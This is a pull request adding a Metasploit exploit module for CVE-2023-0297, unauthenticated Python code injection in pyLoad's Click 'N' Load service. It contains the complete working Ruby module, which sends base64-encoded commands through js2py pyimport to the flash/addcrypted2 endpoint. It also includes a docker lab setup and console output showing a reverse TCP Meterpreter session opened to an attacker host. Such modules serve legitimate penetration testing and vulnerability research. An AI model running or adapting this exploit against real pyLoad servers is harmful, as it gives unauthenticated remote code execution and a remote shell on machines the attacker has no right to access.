### PR TITLE
Add Exploit For CVE-2023-0297 (pyLoad js2py Execution)

### DIFF
--- a/documentation/modules/exploit/linux/http/pyload_js2py_exec.md
+++ b/documentation/modules/exploit/linux/http/pyload_js2py_exec.md
@@ -1,0 +1,65 @@
+## Vulnerable Application
+
+pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport
+functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request
+to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,
+the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on
+port 9666 and can be used remotely without authentication.
+
+## Verification Steps
+
+1. Start a vulnerable instance of pyLoad using docker
+2. Start msfconsole
+3. Run: `use exploit/linux/http/pyload_js2py_exec`
+4. Set the `RHOST`, `PAYLOAD` and payload associated options
+5. Run: `run`
+
+### Docker Setup
+
+```
+docker run -d \
+  --name=pyload-ng \
+  -e PUID=1000 \
+  -e PGID=1000 \
+  -e TZ=Etc/UTC \
+  -p 8000:8000 \
+  -p 9666:9666 \
+  --restart unless-stopped \
+  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
+```
+
+## Options
+
+## Scenarios
+
+### pyLoad 0.5.0b3.dev30 via Docker
+
+```
+msf6 > use exploit/linux/http/pyload_js2py_exec 
+[*] Using configured payload cmd/unix/generic
+msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/pyload_js2py_exec) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Successfully tested command injection.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending stage (24380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500
+
+meterpreter > getuid
+Server username: abc
+meterpreter > sysinfo
+Computer     : f03ec089a4fe
+OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > pwd
+/config/data
+meterpreter > 
+```

--- a/modules/exploits/linux/http/pyload_js2py_exec.rb
+++ b/modules/exploits/linux/http/pyload_js2py_exec.rb
@@ -1,0 +1,144 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/stopwatch'
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '',
+        'Description' => %q{
+        },
+        'Author' => [
+          'Spencer McIntyre', # metasploit module
+          'bAu' # vulnerability discovery
+        ],
+        'References' => [
+          [ 'CVE', '2023-0297' ],
+          [ 'URL', 'https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/' ],
+          [ 'URL', 'https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad' ],
+          [ 'URL', 'https://github.com/pyload/pyload/commit/7d73ba7919e594d783b3411d7ddb87885aea782d' ] # fix commit
+        ],
+        'DisclosureDate' => '2023-01-13',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'python'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_PYTHON],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            }
+          ],
+          [
+            'Python',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'Type' => :python_exec
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(9666),
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    sleep_time = rand(5..10)
+
+    _, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_python("import time; time.sleep(#{sleep_time})")
+    end
+
+    vprint_status("Elapsed time: #{elapsed_time} seconds")
+
+    unless elapsed_time > sleep_time
+      return CheckCode::Safe('Failed to test command injection.')
+    end
+
+    CheckCode::Appears('Successfully tested command injection.')
+  rescue Msf::Exploit::Failed
+    return CheckCode::Safe('Failed to test command injection.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      if execute_command(payload.encoded)
+        print_good("Successfully executed command: #{payload.encoded}")
+      end
+    when :python_exec
+      execute_javascript("pyimport builtins;pyimport base64;builtins.exec(base64.b64decode(\"#{Base64.strict_encode64(payload.encoded)}\"));")
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    # use the js2py pyimport command to import the os module to execute a command, use base64 to avoid character issues
+    # using popen instead of system ensures that the request is not blocked
+    javascript = "pyimport os;pyimport sys;pyimport base64;_=base64.b64decode(\"#{Base64.strict_encode64(cmd)}\");os.popen(sys.version_info[0] < 3?_:_.decode('utf-8'));"
+    execute_javascript(javascript)
+  end
+
+  def execute_python(python)
+    # use the js2py pyimport command to import the builtins module to access exec, use base64 to avoid character issues
+    javascript = "pyimport builtins;pyimport base64;builtins.exec(base64.b64decode(\"#{Base64.strict_encode64(python)}\"));"
+    execute_javascript(javascript)
+  end
+
+  def execute_javascript(javascript)
+    # https://github.com/pyload/pyload/blob/7d73ba7919e594d783b3411d7ddb87885aea782d/src/pyload/core/threads/clicknload_thread.py#L153
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'flash', 'addcrypted2'),
+      'vars_post' => {
+        'crypted' => '',
+        'jk' => "#{javascript}f=function f2(){};"
+      }
+    )
+
+    # the command will either cause the response to timeout or return a 500
+    return if res.nil?
+    return if res.code == 500 && res.body =~ /Could not decrypt key/
+
+    fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
+  end
+end

--- a/modules/exploits/linux/http/pyload_js2py_exec.rb
+++ b/modules/exploits/linux/http/pyload_js2py_exec.rb
@@ -17,8 +17,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => '',
+        'Name' => 'pyLoad js2py Python Execution',
         'Description' => %q{
+          pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport
+          functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request
+          to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services,
+          the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load"
+          service runs on port 9666 and can be used remotely without authentication.
         },
         'Author' => [
           'Spencer McIntyre', # metasploit module


### PR DESCRIPTION
This adds an exploit for CVE-2023-0297 which is unauthenticated Javascript injection in pyLoad's Click 'N' Load service. Javascript execution is provided by the [Js2Py](https://pypi.org/project/Js2Py/) library which exposes Python modules through the `pyimport` statement. Using that it is possible to execute unrestricted Python and OS commands.

## Verification Steps

- [ ] Start a vulnerable instance of pyLoad using docker
- [ ] Start msfconsole
- [ ] Run: `use exploit/linux/http/pyload_js2py_exec`
- [ ] Set the `RHOST`, `PAYLOAD` and payload associated options
- [ ] Run: `run`

Setup a vulnerable instance using docker:

```
docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30
```


### Example

```
msf6 > use exploit/linux/http/pyload_js2py_exec 
[*] Using configured payload cmd/unix/generic
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(linux/http/pyload_js2py_exec) > exploit
[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500
meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter > 
```